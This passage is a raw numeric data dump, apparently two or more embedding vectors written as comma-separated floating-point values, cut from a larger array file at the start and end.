3,0.0031923929,0.0026368992,-0.010761116,-0.0067067784,0.0086615775,0.0012568096,-0.026499448,-0.0018396473,0.011654807,-0.008101426,-0.044458557,0.013489956,0.013260463,0.010336029,0.0032168548,0.0045494447,0.016914155,-0.011173556,0.03150562,-0.02054109,-0.012532744,-0.003632211,-0.005314365,-0.012089296,-0.010148162,-0.03529491,0.000003458197,0.017327394,-0.008925436,0.009194572,0.00058483577,0.015837215,0.022877319,-0.02919013,-0.009305815,-0.00043426437,-0.0089792665,-0.0049725883,-0.036498483,0.003962572,-0.003972806,-0.013203371,-0.008770655,-0.024154786,0.009754312,-0.015042414,0.0060192314,0.0018612514,0.020280214,-0.0041423924,-0.020409336,-0.017513694,-0.008543325,-0.00821447,-0.012598871,-0.005722994,-0.0052955793,0.00057018484,0.036897402,-0.028887793,0.0069137015,0.009370909,0.029193044,0.0356289,-0.020392794,0.0067680515,-0.0005764886,-0.015907481,-0.016301101,-0.028167265,-0.010323022,-0.0044541634,-0.030887816,-0.021513075,-0.0028383548,-0.0006909381,-0.035476904,0.0070475102,0.029121615,0.0040380014,0.012830939,0.009208007,0.0010764707,-0.034549937,0.004588318,0.024382781,-0.009780614,0.004885862,0.0025970896,-0.015048367,-0.050841086,-0.022443755,-0.02063097,-0.005749337,0.0046725636,-0.0130653605,0.01191964,0.022404207,0.039976012,0.012274242,0.017164819,0.028902732,0.0065410035,-0.012339832,-0.0045850854,0.0040029967,-0.038162775,0.010933886,-0.010535854,0.019888813,0.019636853,0.021873813,-0.02554433,0.010307898,0.008426298,-0.005336243,-0.015995964,-0.00008147641,0.030237166,0.003005911,-0.027295629,-0.02704304,0.0036670987,0.006126674,-0.026146246,-0.04302002,-0.003977866,-0.009923205,0.013849212,0.012302858,0.006188457,-0.008702604,-0.008726506,0.0063940934,0.021970293,0.007389804,-0.025756286,0.029408451,0.010029945,0.011765055,0.0136147365,-0.008658095,0.009201728,0.03127709,0.008001407,0.0149958115,0.01076222,0.018350486,0.032509428,-0.00897514,0.011558492,0.008595525,0.0023876568,0.0033836786,-0.004985774,-0.01779986,0.0055722245,-0.034041706,0.002213363,-0.0040852204,-0.010406684,0.0031636134,-0.024209516,0.0005458288,-0.13854408,0.0015617785,-0.006992322,-0.02133675,-0.008804955,-0.008000084,0.0022594456,-0.0005559428,-0.0028396295,-0.012969078,0.008128044,0.0264138,0.013608747,0.010827071,0.006790376,0.0049008178,-0.021863986,-0.0038186777,-0.016515467,0.0018361,0.031520568,-0.018323617,-0.011652898,0.006500491,-0.0019985777,0.0054751984,-0.010118484,0.0097084185,0.0016802965,0.00022988651,-0.0020838373,0.019653158,0.007670782,0.013951509,0.0063631823,0.0070323804,-0.013514479,0.012388856,0.0029343776,0.022903865,-0.0005598835,-0.0065800166,0.0023411664,0.007343322,-0.0016035223,-0.0043583037,0.013725634,0.015256684,0.013597972,0.020304602,-0.013822012,0.02414765,0.003041638,-0.009811128,-0.022836199,-0.01810346,-0.007155497,-0.0045934017,0.007419848,0.010235241,-0.011814344,0.00452943,0.015108,-0.022190765,0.0034874133,0.009563877,0.006691756,0.013795208,-0.014877935,-0.0068271616,-0.010582293,0.0013279992,-0.0014330565,0.011530856,-0.00891959,0.008852,0.0020274231,-0.008400779,-0.0024506114,0.012603264,-0.042559,-0.0038403228,0.0036073679,0.039058562,0.009751235,-0.03011897,0.015340092,-0.005004834,0.0015050012,0.032791093,0.0015372685,-0.0016376502,-0.0070379293,-0.00066025206,-0.0018501603,0.008728162,-0.017388806,0.0043976377,-0.0039608013,-0.013765644,-0.0006738478,0.0071021947,-0.011740934,-0.020377941,-0.11693836,-0.019553386,-0.00041218576,-0.008419831,-0.0021616793,-0.021047866,0.019296769,-0.0017800689,0.025887504,0.0008298707,-0.026429895,0.007938299,-0.011846387,0.0005181245,0.0029361157,-0.003334496,-0.035574913,0.008069767,-0.00859775,-0.016062636,0.01033765,-0.01608393,-0.0056185587,0.008133158,0.0011347958,0.0116163045,0.021145979,0.048910815,-0.0048913807,-0.004632081,-0.005225516,0.020628558,-0.0054824934,-0.00044181824,-0.039266415,-0.015791511,0.03341786,-0.019806106,-0.009124433,0.03435175,0.0065259915,0.00066181464,0.009461261,0.019591704,0.0056756283,-0.0088997,-0.004710709,0.041493207,-0.018911062,-0.0107763065,-0.008375632,0.008407202,-0.016445197,-0.019110864,-0.019691944,-0.02549168,-0.0031838766,0.0035024402,0.02596595,0.004188016,0.004051191,0.022988498,0.005156779,0.0061963517,-0.000064755935,0.0010746572,-0.021642465,0.008562618,0.013721516,0.016723968,-0.011086863,0.046706405,-0.0029064885,-0.023944473,0.02725612,0.0052506295,0.012781288,0.02933115,0.016202806,-0.011430017,0.005795085,-0.021721356,0.007949302,0.011681875,-0.036401358,-0.0009710507,0.013065206,-0.011510507,-0.031315472,-0.0022495138,0.03706456,0.0035577381,0.003275877,0.02039949,0.011159468,0.011563233,0.055775072,-0.007034595,-0.011412255,-0.015446024,0.01370788,-0.02426913,-0.010671324,0.0031849816,-0.0105988495,0.021991653,0.018175514,-0.027454942,-0.0010144676,0.0038150507,-0.010395295,0.03883688,-0.012931901,0.016504085,0.015188289,-0.0063582007,0.0031490389,0.00020830502,-0.016727816,-0.00050589483,0.0043568304,-0.0030275122,0.005174206,-0.017195791,0.0006801573,-0.009359243,-0.018037852,0.023445955,0.009031857,-0.03532389,0.0093765445,0.0050295577,-0.0014414589,-0.0061837346,0.0037922657,0.019370766,-0.015928794,-0.010312204,0.01535312,0.003917968,0.01730262,-0.0015323822,0.0022101114,-0.004240387,-0.0033933371,0.01448653,-0.0053613773,-0.0033486905,-0.014468233,0.0031670472,-0.0024214797,-0.0073534064,0.005435828,0.01809116,0.020709975,0.005971185,-0.014664113,0.010772663,0.008132179,0.0036533407,-0.008480435,0.014213688,0.027704444,-0.008324843,-0.026186131,-0.007998516,-0.010696441,-0.0011230226,0.002139917,0.014133762,0.016137969,-0.0036770613,0.020141892,-0.04558568,0.010090249,0.004852459,-0.0026011302,0.008434024,0.023526367,0.018004976,-0.026884416,0.006372088,-0.01341796,0.001838148,0.00088966213,0.014566033,-0.009630615,-0.02032884,-0.01911988,-0.021330703,0.031995714,0.0023102595,-0.011463151,-0.017755782,-0.0044591185,-0.0018939541,-0.0002615221,0.0032571324,0.023835856,-0.004642001,-0.034482583,0.004155933,-0.0009446522,-0.005762155,0.005639942,0.008011792,0.0052257525,0.02899804,0.01639827,-0.010108034,-0.021474833,0.012551968,-0.01657151,-0.009826369,0.010643376,0.023987979,-0.010812912,-0.011037751,0.020372273,0.007347133,-0.0062042084,-0.022601917,0.00016225636,-0.0106288595,-0.0147361625,0.024713498,0.010862538,0.02185242,-0.014821757,-0.022845184,0.008431583,-0.0068712374,-0.036336474,-0.01763056,0.0134826135,-0.012398548,0.0233168,-0.003198044,0.008108001,0.0071294256,0.03294384,0.003255204,0.028349884,0.014019053,0.006380795,0.0014159662,0.013587219,-0.0031865637,0.016347952,0.033629604,0.0058877678,-0.0030881267,0.0012489455,-0.006661651,-0.010089321,0.012669844,0.017659694,-0.0057798363,-0.0026821943,0.003482291,-0.0101918485,-0.0063248225,-0.020519342,-0.02553192,-0.011847278,-0.0042336355,0.0014510005,-0.019362524,0.0006957183,-0.015206215,0.01980629,-0.0025816092,-0.018584609,0.013261921,-0.0051695034,-0.0072627114,0.020518377,-0.0028355613,0.0001259938,0.0047185924,-0.003420993,-0.0005733178,-0.024988309,0.038472485,-0.004026787,0.0023186614,0.0029508611,0.018263651,-0.023131128,-0.005924931,0.022948334,-0.010040548,0.0038004678,0.007826447,0.004685984,0.0025535242,0.005895458,-0.0018474631,0.0034251516,0.026465539,0.015758198,-0.011588324,-0.0045038946,-0.029076438,0.010331518,-0.0122825615,-0.0033671013,0.022497982,0.012993537,-0.0043020556,-0.028631624,0.013233801,-0.011260123,0.00064050575,0.0012891919,-0.009284122,0.010723745,0.0015271218,-0.03625457,-0.020194776,0.0031216817,-0.009205797,0.021271566,-0.017362852,0.0103749065,0.0036851321,0.0010278632,0.050203398,-0.017777769,-0.007854851,0.0018643166,-0.04608721,-0.00016193688,0.0072153974,0.019616906,0.016173309,0.021956535,0.032589324,-0.023605825,0.01795191,0.00019686697,-0.007747407,0.0031257921,0.009448323,0.0055319266,0.014398091,0.002131467,0.0013011947,-0.0073471004,0.0029328917,0.00025455182,0.000113924005,-0.0031499916,-0.004584668,-0.03750317,0.017102476,-0.04219438,-0.0028288811,0.008028323,-0.008743756,-0.013736122,0.0012749664,-0.008807774,-0.026673697,0.008746387,-0.02221496,-0.00054839667,0.008993537,-0.010938633,0.008606243,-0.006619706,0.021152506,-0.022464478,-0.014241507,0.0015236737,-0.08729635,-0.010161895,0.0012593566,0.014560718,0.042954892,-0.0031439185,-0.0016985722,-0.008350661,-0.002912857,0.01865489,-0.012108195,-0.010530852,-0.012170218,0.012193756,0.02560949,-0.026549576,-0.032965325,-0.0037824386,0.0028674628,-0.026347019,0.004315288,-0.000789911,-0.019273687,-0.008095315,0.018458217,0.0011991847,-0.008321461,-0.0066568586,0.00814829,0.018234812,-0.007320581,0.0014599891,-0.00803724,-0.015329206,0.0023755992,0.0034326871,-0.011191467,0.02738561,-0.035071176,-0.03976409,0.0027863088,0.0005676762,0.009671545,-0.009988424,-0.037034966,0.01683057,-0.02281817,-0.014274989,-0.004711342,-0.0044454243,-0.007557574,0.009203878,-0.016984057,0.016638054,0.0074215415,-0.0011543588,0.00020322046,-0.0044369595,0.040547986,0.006564518,0.002240881,0.0078023192,0.0022707935,0.00040216793,0.00013896788,-0.01567009,0.0061799055,0.008283304,-0.002280255,0.012453022,-0.0014389323,-0.02459648,-0.017618902,-0.012694696,-0.011447605,-0.01029947,0.016228152,-0.018501507,-0.021081964,-0.0067087524,0.048499197,-0.001118218,0.03155871,-0.0047803395,0.0013769061,0.0217743,-0.011876844,-0.022469003,0.02848568,0.002866451,-0.020649616,-0.006490523,0.017366948,-0.012777493,0.01352615,0.009472509,-0.009250709,0.0076599643,-0.0082041,0.009946741,0.008119769,0.0126781305,-0.008431738,-0.018168885,-0.005616009,-0.01195203,-0.007462858,-0.0063627767,-0.0043222047,-0.01103674,0.003316327,0.027943963,0.006709864,0.047491357,0.011077704,-0.0007644779,-0.017554889,0.022189654,-0.008278551,-0.025494816,0.0038575616,-0.008060399,-0.016651038,0.029069215,0.020429956,0.009900925,0.0188903,-0.0022930973,-0.016729424,0.0108587975,-0.0073003685,0.02608118,0.015931461,0.0102864355,-0.008912037,0.012208834,-0.014241695,0.03025071,0.0011554782,0.01378586,0.0016210495,0.0055065183,0.014452746,0.00066472945,-0.019298987,0.03659584,-0.013825262,-0.01039607,-0.0065698344,-0.033123054,-0.0018303269,0.019502243,-0.0047505153,0.0026357856,0.019404063,-0.0047527472,0.008387806,-0.0062138843,-0.034344323,-0.0036235882,-0.004825856,0.017761368,-0.0071668704,-0.009296254,-0.02753953,0.017979851,0.008864036,0.011709924,-0.009975417,0.015713073,-0.013780138,-0.014299955,-0.0014941226,-0.009411711,-0.017870592,-0.02846254,0.017455496,0.010324472,-0.005665911,0.00518128,-0.019294376,0.006347212,-0.00032445314,-0.018374464,0.002882958,-0.01956708,0.00074938807,0.0073354007,0.012554474,-0.0052620666,-0.004834081,-0.033840336,-0.0042824163,-0.020985357,0.0066725886,-0.0033753866,0.01127946,-0.004581322,-0.00074014993,0.003937234,-0.0038256564,-0.0010699251,-0.00096295023,0.0127179595,0.043177605,0.025891166,-0.020079678,0.032121215,-0.0061663627,-0.015081086,-0.0008885622,0.015829606,0.0016047189,0.10206065,0.008869168,-0.0012528361,-0.003987593,0.0033809876,0.00038376986,-0.0041566887,0.009981167,-0.005213403,0.0039892797,0.02161733,-0.01796821,0.015011218,-0.000153182,-0.0076604383,0.029246705,0.015669566,-0.008295448,-0.0014213658,0.02171143,0.018950786,-0.022257173,-0.03220935,-0.052114002,-0.012296208,-0.043564335,0.013246032,0.019126045,0.0030970857,0.034793265,-0.004231038,0.001756853,0.009377303,0.016110392,-0.019982813,0.012809128,0.021534314,-0.011674978,0.013611173,-0.027721127,0.025023835,0.006637842,0.005611851,-0.0043772906,-0.016557071,-0.017090596,0.015126182,-0.018228242,-0.014275746,-0.0036409989,0.0014372832,0.008897837,0.00030724722,-0.023648214,0.011155547,0.0026127037,0.006292187,0.014974567,-0.0073324055,-0.00052537234,0.00457463,0.0031128628,0.002858442,-0.013713992,0.004644091,-0.0047047045,-0.0045752013,-0.0067637535,0.008491407,-0.017688721,0.023837872,0.006709267,-0.020515379,0.0062868893,-0.0077491533,0.010572428,-0.006520611,0.0061392924,0.013459974,-0.016787598,-0.02045769,-0.0006278645,0.004276209,-0.010481975,0.0049841194,0.009704466,-0.0018405218,0.026302263,-0.011943632,-0.032030024,-0.022322794,0.026343534,0.024446476,0.010496045,-0.0052058343,0.01001831,0.008934265,-0.00040968403,-0.012099623,-0.005257337,-0.030968724,-0.011175607,0.011599191,0.010793737,0.0052383514,-0.013349398,0.00076649385,0.001003695,-0.0116482945,0.0027801292,-0.00007313695,0.0322683,-0.013014268,0.0023901814,-0.004463106,0.039469548,-0.03472975,-0.016037261,-0.0070123994,-0.01559356,0.0021576998,0.006422875,-0.021268882,0.028751338,-0.0024167977,-0.004953843,-0.0025517542,-0.0022812083,0.007019058,0.01111342,0.016344912,-0.03910838,0.0069277612,0.02309324,-0.005114375,-0.0045249364,0.02236269,-0.0033027611,0.024044488,-0.0008231854,0.01325407,-0.013282967,-0.011294097,-0.017333496,0.012540445,-0.01612217,0.02408519,-0.0099018235,-0.0078119193,0.005981312,0.013913596,0.0096520865,-0.018639376,-0.017593546,-0.018964494,0.004206368,-0.01154759,0.007885053,-0.016413542,-0.015008865,0.015567836,-0.00936569,-0.005529525,-0.056784205,0.029873423,0.011345254,0.011070732,0.007619442,-0.014083351,0.0144843245,-0.017537264,-0.019215295,-0.016058091,-0.0068419464,-0.023695456,0.030396039,0.020645449,0.007628867,-0.023258954,0.008371367,0.0031588355,0.011371726,0.00072042376,-0.01096538,0.016439168,0.0035039468,-0.00785992,-0.0027695496,-0.01163383,0.032333225,0.0031615836,0.005092684,0.01251548,0.0026361442,-0.011131987,0.039176393,-0.027056368,0.047768924,-0.015808834,-0.017710237,-0.005238179,-0.00010741978,0.011567096,-0.03914042,0.0018169396,-0.01321894,-0.005956991,0.009370835,-0.0029923597,-0.010794395,-0.00436678,0.004681202,-0.016319392,-0.042560548,0.025351273,0.0063343886,-0.004122617,-0.025050463,-0.024138369,-0.0049053933,0.010361882,0.02051426,-0.016883343,-0.001862897,0.011490842,0.009731543,0.0015988187,0.0133563625,0.023619527,-0.027261276,-0.029052587,0.019568993,0.019554412,0.0028432368,-0.015820034,0.008670592,0.026758205,0.015406359,0.0014986335,-0.009926404,-0.029088927,-0.018801957,0.007590456,0.017196637,0.009334593,0.0045373,-0.028005311,-0.012591541,-0.0011362165,0.0017076354,-0.03412921,-0.009654014,-0.030483041,-0.0049532275,-0.03907775,-0.003086295,-0.008297237,0.017722182,0.008513028,0.0014355943,0.024671838,0.008356234,-0.0024202613,0.015412029,0.002552994,-0.013338151,0.0018661991,-0.006448372,-0.004336524,0.008189694,0.010368119,0.01590188,-0.00939293,0.011145974,0.025872583,-0.006365708,0.008536529,-0.0048457934,-0.007638707,-0.027080856,0.018769998,0.0029695367,-0.009757291,-0.024011612,-0.016746666,0.011363815,-0.014493465,0.016212601,0.05820625,-0.05350048,0.002150972,0.010980876,-0.0017261282,-0.008934779,0.011735909,-0.00037303293,-0.025873957,-0.011291256,0.00781874,0.00976048,0.007217706,-0.029571561,0.007198993,0.0043087467,-0.0013824063,-0.015579157,0.011255228,-0.012519399,0.002867742,0.010319939,-0.0012020393,0.0010180223,-0.00048732717,0.0021109588,0.0033577778,-0.023816867,0.018656718,0.012662582,0.012155416,0.007872955,0.022187425,-0.009762972,0.0008700089,0.009407896,-0.011908882,0.019710263,0.008042543,-0.03949929,-0.014719872,-0.000620824,-0.0009979879,0.021534078,0.0023704679,-0.025406715,-0.012509124,0.012271114,-0.024796516,0.114751264,-0.027845081,0.017897459,0.022252169,-0.010906483,-0.015052402,0.03545647,0.0216219,0.011538493,0.007766728,0.01429366,0.013784252,0.009198587,0.035108842,0.009379872,0.005273162,-0.0034757874,0.13089536,-0.031004148,0.027216118,0.006923886,-0.0035001417,-0.013630343,-0.0026935716,0.013678643,-0.07334143,0.0017737062,-0.052439794,-0.004038601,0.009478298,0.0017080102,0.02364504,-0.011202796,-0.0035317086,-0.01743414,0.023031209,-0.0061879596,0.008247369,-0.021633128,-0.015132338,0.022264902,-0.009931813,-0.008322702,-0.0020694945,-0.011473617,0.025528511,-0.030923394,-0.006459635,-0.021666577,0.012525981,0.014611508,-0.004289214,0.030171676,-0.016245728,0.008130968,-0.0065810764,0.00756328,-0.015489575,-0.005264315,0.024307285,-0.020989,0.014294836,-0.012108983,0.022251656,-0.0027605244,0.005049729,0.0054726806,-0.0018313878,0.013692535,-0.00046029512,0.032691453,0.017728541,-0.023600154,-0.008254723,0.030198462,-0.012844031,-0.001981508,0.0027481064,0.011498092,-0.0081286235,0.025859933,0.013665179,-0.008720994,0.0062918644,0.030643651,0.026940294,-0.011563491,-0.0018553468,0.02685858,-0.034514453,0.010532604,0.006772798,-0.0058964114,0.0016520815,0.0065459935,0.027605226,0.013973066,-0.0024062614,0.003955902,-0.018986752,0.005736509,0.03638535,0.005777815,-0.0008083594,-0.021248646,0.00485894,-0.011779654,-0.015256362,0.011285793,0.0017155866,-0.010725085,0.000026278887,-0.00523911,0.026693815,-0.01166139,-0.0044672727,-0.0029601383,0.011379791,-0.04699656,-0.0072832643,0.016284984,-0.009332679,-0.0028758934,-0.0052907686,-0.017031338,-0.012635532,0.0004337419,0.0372486,-0.020663135,-0.009023226,-0.03305517,0.0015189119,0.008654373,0.0382042,0.00009636065,-0.020653218,0.012512328,-0.014147352,-0.03790575,-0.019856168,-0.0011918998,-0.0032912728,-0.0047596684,0.004307081,-0.015063288,-0.011746564,0.015479109,-0.003789689],[-0.010989305,-0.0031743504,-0.01243551,0.0003326752,-0.006545429,-0.031236986,-0.0026009427,-0.0051844805,-0.005745746,-0.009549027,-0.009150962,0.031937696,-0.0025771325,0.00059810176,-0.014308681,0.0003401225,0.0023679386,-0.005036592,-0.0006040155,-0.0019598496,0.0045840144,0.001702443,0.010500677,-0.002599764,0.004291553,0.0013638714,-0.009039752,0.01966074,0.006682809,0.005062131,-0.010435333,0.015724491,0.013634308,-0.01636786,0.0035403927,-0.0055328757,-0.011712923,-0.019650683,0.009761378,-0.0037170001,-0.0045965235,0.020258686,-0.00588328,0.029181736,-0.005417616,0.01031651,0.00014742842,0.01213969,-0.02576284,0.0008503724,0.0053600753,0.0029084121,-0.023157917,0.010622583,-0.010020522,0.02403141,-0.00047603113,-0.011967585,0.007541222,-0.007830598,-0.00070833985,-0.0010365011,-0.008783528,-0.0111241825,0.025796311,-0.0048747947,0.0060342043,0.006711725,0.006918682,-0.027004715,-0.0090914965,-0.013746697,0.02800861,0.017217606,0.01982265,0.016831938,-0.004126389,-0.014722178,-0.015082851,0.013255315,-0.008796528,0.00009420637,-0.009203921,0.005074238,0.021976164,-0.014346377,-0.016301237,0.0011792614,-0.008273571,-0.027194172,-0.0008758688,0.0078015924,0.008895333,-0.01184066,0.00061054464,-0.00056577317,0.005440159,-0.017367335,-0.005963688,0.016467653,-0.0015108308,-0.01878183,-0.036230337,0.014048988,0.00792533,-0.012127596,-0.005922221,-0.00424188,-0.0020679096,-0.0138489,0.0027680353,0.008155318,0.006532596,0.011204784,0.0026964648,-0.012205505,0.010339414,0.007948771,0.017321995,0.01149672,-0.01632202,0.032266963,0.0028732775,-0.005868669,0.010284307,0.00009653513,-0.010465289,0.009917091,0.0008590852,0.0074729444,-0.0014006648,0.018110273,-0.00073077047,-0.014806971,-0.0064800335,0.0050410996,-0.00024861068,-0.011153075,0.0059900004,0.011477928,0.017251967,0.0006975913,0.0040560407,0.0018706511,0.033586293,0.016763078,-0.0033861515,0.019118488,0.009953548,-0.016537454,0.0032020102,-0.012773921,-0.016820628,-0.021957962,-0.009118657,0.019695472,0.00026233675,-0.019020196,-0.020770285,-0.013109905,-0.019873196,-0.0034607023,0.0048139375,-0.013245221,-0.0025562136,-0.036256716,-0.010449877,-0.002677572,-0.0128546115,0.0050251964,0.013657843,0.023494627,0.010006204,0.0055792755,0.00509076,0.03091024,0.0015440735,-0.023013111,-0.00491753,-0.0031849868,-0.001681874,0.00785521,0.00020919667,-0.003665987,-0.012786389,0.018926239,0.0201014,-0.0075885556,-0.015913347,-0.015498227,0.02106513,-0.0203739,0.000040479194,-0.008881435,-0.012922874,-0.024277123,-0.015318803,0.10342532,-0.013725075,-0.012163624,-0.022063952,0.018706027,0.0033130918,-0.020437434,-0.0122511685,0.0061238874,0.006832493,-0.0077102985,0.0071660196,-0.0055635357,0.01480743,-0.0010926089,0.00006122491,0.010574852,0.032838352,-0.063768275,0.016585147,0.028127326,0.0041551567,0.0027448966,-0.01272007,0.008725924,0.007207097,-0.023300316,-0.018548688,-0.015176695,0.009233095,0.0014312529,0.013999952,-0.004285716,0.018889327,0.012178318,-0.025315447,-0.016864384,0.010292446,-0.014030712,0.007841053,-0.015170451,0.008883142,-0.0066850916,-0.0025596204,0.009726724,0.021454195,0.033330366,-0.02691339,0.009114679,0.030752506,0.0074141505,-0.020403355,0.0029421886,0.006498727,-0.010889681,0.0038686367,0.018208135,-0.0069000027,-0.011535554,-0.009138115,-0.01636639,0.0043985574,-0.013843198,0.02225872,0.0102848755,-0.0049409205,0.012965113,0.025383875,0.00747228,0.025286797,-0.04010239,-0.0048070806,-0.01249477,-0.014290728,0.0010407108,-0.0071253004,0.0026368732,-0.0006341825,0.008349968,0.024281407,0.0084926495,0.020970741,-0.013040505,-0.0012567863,0.013638468,-0.0020823204,-0.029935576,-0.01411766,0.0034306669,-0.001498711,0.013476032,0.02137409,-0.0005865562,0.008367055,0.006920138,0.017579814,0.013246703,-0.008730384,-0.0021582455,-0.023107897,0.018382246,0.0064279893,-0.020440575,0.0050800154,-0.01290799,0.015524965,-0.009962165,-0.010336865,-0.00063305994,-0.021938996,0.038767487,-0.020196984,0.038436238,-0.032624125,-0.0026394222,-0.021640897,-0.012371756,0.0077398564,0.009098663,-0.009014049,-0.018541755,-0.009184174,-0.010830289,0.020674543,-0.012032881,0.0025252644,-0.033005342,-0.027001489,0.017590402,-0.008695388,-0.016538873,-0.0064123236,0.012545813,-0.021254914,0.012590751,0.016976893,0.014849407,-0.0280107,0.024278961,-0.015961401,0.02702852,0.0066468106,0.01247193,-0.021042086,-0.014852357,0.001522977,0.017485445,0.009049848,0.0014308268,-0.0075874105,0.0022456532,0.010100766,0.0000033864255,0.01840203,-0.00865658,-0.009816561,-0.014813266,-0.019292783,-0.001812736,-0.0082241595,-0.00009699662,0.013885188,-0.024083575,0.016503088,-0.012029021,-0.009086762,0.0075685303,0.083528936,-0.0014612922,-0.009509145,-0.009243331,-0.020474402,-0.008722921,0.032701902,0.026050296,0.004130581,-0.0035418144,-0.019153457,-0.03001378,0.005296781,0.0041568074,-0.017219502,0.02035993,-0.014805616,-0.011276596,-0.0063811033,-0.013079195,0.022929054,-0.00015182632,-0.001506993,0.019380646,0.007845884,0.015116621,0.0047600674,-0.0014528289,0.018491417,-0.0153049715,0.004350173,-0.003153318,-0.009139217,0.001289175,-0.03331242,0.021201266,0.0048123524,0.0050070276,-0.015919195,-0.00393757,0.00046737684,-0.002263514,0.0011529088,-0.015792757,-0.013267927,0.032969423,0.0019855476,-0.012604763,-0.017453268,0.019055996,-0.006666176,0.028758697,-0.022663845,0.021247448,0.007151462,0.02305592,0.011717459,-0.032008193,0.05203545,0.014390466,0.004337595,0.018316416,-0.0015216436,-0.010030629,0.0075283223,0.014302808,-0.01876688,-0.0089208,0.0005972911,-0.008451273,0.0067119077,0.011874446,-0.011561219,0.004692757,-0.010471459,0.0123612825,0.013504846,-0.012951097,0.0028297657,0.014203417,-0.00415399,-0.0066286004,0.005941879,-0.009731462,0.006755196,-0.008084575,-0.0023134507,0.009884923,-0.0063707805,0.011901011,-0.008152744,0.018794762,0.004717874,0.006769343,0.027017904,0.026533771,0.010291345,0.022159528,-0.012522086,0.021580236,0.012175455,-0.013966272,-0.000013825427,-0.0065635,-0.0039016926,0.00012795703,0.01784181,-0.005193753,0.0024295247,0.024531392,-0.006945095,0.0067957332,-0.006614715,-0.027959188,-0.004288569,-0.022986306,0.009751213,-0.021235242,-0.014035155,0.00063217746,0.010690033,0.013384797,0.0093911765,0.011519162,0.0013057454,0.0073750746,0.0018466765,-0.022407135,0.014507704,0.020408789,-0.00011389947,0.038708977,0.032225307,-0.0360422,0.018548103,0.021871552,-0.010050002,-0.0222912,0.0365657,0.009394439,0.013618136,0.028745878,0.04526685,-0.014290804,0.0051120897,0.026536101,0.030877447,0.004014001,-0.023921467,-0.0031057096,0.005704182,-0.0029706836,0.010242233,-0.0062479503,-0.007401027,0.005517925,0.021811731,-0.017262546,0.0154869035,0.0034555143,0.013880998,-0.02474656,-0.00293083,0.0014238273,-0.012201735,0.0014613285,-0.010880057,0.06621418,-0.016182136,-0.053661715,-0.010934341,0.01578838,0.0014219839,-0.003641757,0.006308217,-0.023705835,0.02596808,0.010312874,0.027785735,0.0056974147,0.0219327,-0.017419977,-0.011801944,0.0130005535,0.012046354,-0.016520005,0.0018243326,0.0059242477,-0.005851907,-0.026716715,-0.030147346,-0.019952018,-0.0033416518,0.024285873,0.0038324248,-0.01523914,-0.009172446,-0.021001799,0.0038655275,0.019261232,-0.0031763145,0.012605338,0.0062875277,0.015677452,-0.0023686616,-0.021637,0.03904413,-0.008331902,0.00414611,-0.008799798,0.009456883,0.015161167,0.003187743,-0.0008069138,0.008600756,0.0143639725,0.0063925968,-0.008567565,0.027880369,0.009743318,0.017075738,-0.0002075029,0.0024197954,0.012230517,0.008746011,-0.023914464,0.016571466,-0.008524664,-0.0047328016,-0.010235405,-0.0066888146,0.00024154792,0.0035775928,0.00539362,-0.0131174885,-0.0022775452,-0.020979807,-0.00061364827,0.0010953338,-0.020663384,-0.035725556,0.028027097,0.011916114,-0.012136265,0.023087861,0.02353043,-0.017930018,0.006739655,0.017239226,0.0019283884,-0.0028896655,0.011342416,0.00597662,-0.0014901754,-0.0054167756,0.010167954,-0.0044750096,0.017348353,-0.0077175344,0.009080179,0.0051412606,0.021313513,0.021759735,0.0064193965,-0.019721363,-0.0040822704,0.009394723,-0.017563924,-0.0061990125,-0.010257673,0.04216328,-0.014363419,0.0029978396,0.008765544,-0.0020935028,0.016511897,-0.0267578,0.0022399693,-0.04279793,-0.004543911,0.019581879,0.012062403,-0.01241726,0.038783535,0.030457413,-0.0070795775,0.00827435,-0.0019120846,-0.010688624,0.021150904,-0.0029867585,-0.00012949553,0.0003072624,-0.011768914,-0.049406312,-0.017330602,-0.035497304,-0.059940718,-0.029752929,0.04863697,0.006730826,0.0068298574,0.00045216546,0.0120032905,-0.025929652,-0.01972949,-0.013123632,-0.039143384,-0.005160999,0.011061935,-0.006063845,0.020664718,0.025697703,-0.00751353,-0.0096380655,-0.015520661,-0.016239908,0.001640018,0.009693792,-0.03903928,-0.0124817975,0.014519351,-0.031584207,0.012809128,-0.030227564,0.024698965,0.0042345,0.03761572,0.024632894,0.01687508,-0.011861795,0.013517801,-0.010580113,0.005641731,-0.002152705,0.024685081,-0.0020457048,0.008688064,0.0081594065,0.0009957219,0.00012425566,-0.026395807,-0.00088704424,0.020825032,0.03957484,0.012351783,0.024122631,-0.005064519,0.018464258,0.011660893,0.012312515,-0.01125871,0.019051218,0.017912848,0.0072649834,0.01756746,-0.012047222,-0.005974639,-0.02497942,-0.026094854,-0.015044846,0.027098216,0.02529289,-0.0001300394,-0.0017033501,0.014893444,0.00014539348,-0.01007342,-0.02288397,0.0038648,0.006911852,-0.0053253486,-0.008134615,-0.030904155,0.0056532747,-0.03212019,0.0113221435,0.021120062,0.004025766,-0.0015089797,-0.0016163781,-0.02331249,0.0024727867,-0.01893921,-0.042212624,-0.017393187,0.009307771,0.022155115,-0.005497089,0.008193003,0.012311017,0.006715588,0.018041711,0.023653775,-0.026209312,-0.019240646,0.00806087,-0.011803677,0.021057164,0.028681437,0.02098333,0.0068781353,0.0015558518,-0.011084643,-0.01698172,-0.013695179,0.0067997864,0.004702466,0.009681079,0.004881647,-0.0029933697,-0.0032871522,-0.022053128,-0.019060137,0.021184977,-0.050416246,-0.023887092,-0.0039614094,0.013495182,0.0033987283,0.027919762,-0.016517995,0.029396871,0.032095715,-0.005801039,0.011355101,-0.018096378,0.01634537,0.04147981,0.023660226,-0.016174216,-0.034420565,-0.008218488,-0.0048091123,-0.011336801,0.014820324,-0.003270346,-0.021616125,-0.01969468,-0.015206038,0.005848278,-0.019204656,0.004747975,0.005923477,-0.029132409,0.023344938,-0.009763551,0.0028016723,0.022785194,-0.0036196373,0.010299233,-0.015289726,0.01077785,-0.023057098,-0.018049892,0.015749551,-0.01221306,0.014163923,0.018040728,-0.030663496,-0.025253396,-0.03361374,0.014260468,-0.012590969,0.014049638,0.014522236,-0.022425931,-0.01998213,0.017980596,-0.0094690705,0.013788356,-0.015922293,-0.0060597993,-0.006872393,-0.0027447825,0.014836325,0.006086779,-0.034807794,0.017223664,-0.0017418404,-0.032958712,0.023324404,0.0043260646,0.000528107,-0.0024770352,-0.0013851682,-0.0016204973,-0.03654112,0.03101025,-0.016184872,-0.005613599,0.0339903,-0.005836456,0.020647345,0.00263324,-0.008196595,-0.014986928,-0.010459877,0.014316699,-0.02191911,0.007140401,0.0020424856,0.008720816,0.0048000743,-0.02151614,0.016437303,-0.0057122307,0.006345841,0.032944206,-0.0023186957,